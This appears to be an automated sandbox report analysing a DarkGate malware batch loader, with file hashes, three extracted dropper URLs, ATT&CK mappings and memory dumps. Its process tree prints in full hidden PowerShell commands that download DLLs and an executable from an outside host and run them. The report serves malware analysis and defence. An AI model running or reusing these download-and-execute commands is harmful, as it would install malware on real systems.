Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    20-08-2024 01:40

General

  • Target

    exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat

  • Size

    6KB

  • MD5

    97b7c88a02b2a5214d742b7ed50f4544

  • SHA1

    15bf7dd44049b94db1a82504802ead45f6186fa0

  • SHA256

    20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6

  • SHA512

    918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25

  • SSDEEP

    192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tt.vg/download-update-dll1

exe.dropper

https://tt.vg/dlldownload2sqliuit-download

exe.dropper

https://tt.vg/download-latest-update

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2312

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d0b76051cf9d8f3c639c94066bf0f41f

    SHA1

    a9045e38032f48098a23df52dda7fd6b694b1ddc

    SHA256

    9482eb4042756f41ee68e6dec6a08f44b543e8c1c969928ee2a6aeeb476b1eb4

    SHA512

    084bc10df931ae8d277a95f9f5ae1c2a62fb13f1edec39eca31a998808f0028edd176342ae4a272098f9a9e90e344b824d87a73989882d4326d01a6219d09d30

  • memory/2312-18-0x000000001B700000-0x000000001B9E2000-memory.dmp
    Filesize

    2.9MB

  • memory/2312-19-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
    Filesize

    32KB

  • memory/2628-4-0x000007FEF618E000-0x000007FEF618F000-memory.dmp
    Filesize

    4KB

  • memory/2628-6-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp
    Filesize

    9.6MB

  • memory/2628-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
    Filesize

    2.9MB

  • memory/2628-7-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
    Filesize

    32KB

  • memory/2628-8-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp
    Filesize

    9.6MB

  • memory/2628-9-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp
    Filesize

    9.6MB

  • memory/2628-10-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp
    Filesize

    9.6MB

  • memory/2628-11-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp
    Filesize

    9.6MB

  • memory/2628-12-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp
    Filesize

    9.6MB